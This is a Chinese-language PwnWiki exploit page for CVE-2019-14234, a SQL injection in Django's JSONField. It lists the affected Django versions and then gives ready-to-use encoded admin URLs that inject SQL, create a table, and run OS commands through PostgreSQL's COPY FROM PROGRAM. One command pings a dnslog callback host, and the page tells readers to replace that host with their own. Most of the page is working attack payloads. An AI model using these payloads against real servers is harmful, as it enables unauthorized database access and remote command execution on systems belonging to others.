CVE-2019-14234 Django JSONField SQL注入漏洞

Other languages:

Chinese • ‎español • ‎русский • ‎中文（中国大陆）‎

影響版本

Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23

漏洞利用

首先需登錄管理員後臺，訪問模型Collection的管理頁面：

http://127.0.0.1/admin/vuln/collection/

http://127.0.0.1/admin/vuln/collection/?detail__a%27

http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--

Django一般與PostgreSQL一起配合使用，可以嘗試利用PostgreSQL 高權限命令執行漏洞(CVE-2019-9193)

訪問以下URL：

http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20

回顯no results to fetch 語句成功執行。

訪問：

http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20

命令成功執行。

⚠️️

test.dnslog.cn請修改爲自己的Dnslog

Anonymous

Search

CVE-2019-14234 Django JSONField SQL注入漏洞

Namespaces

More

Page actions

影響版本

漏洞利用

⚠️️

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

CVE-2019-14234 Django JSONField SQL注入漏洞

影響版本

漏洞利用

⚠️️

Navigation

Wiki tools

Page tools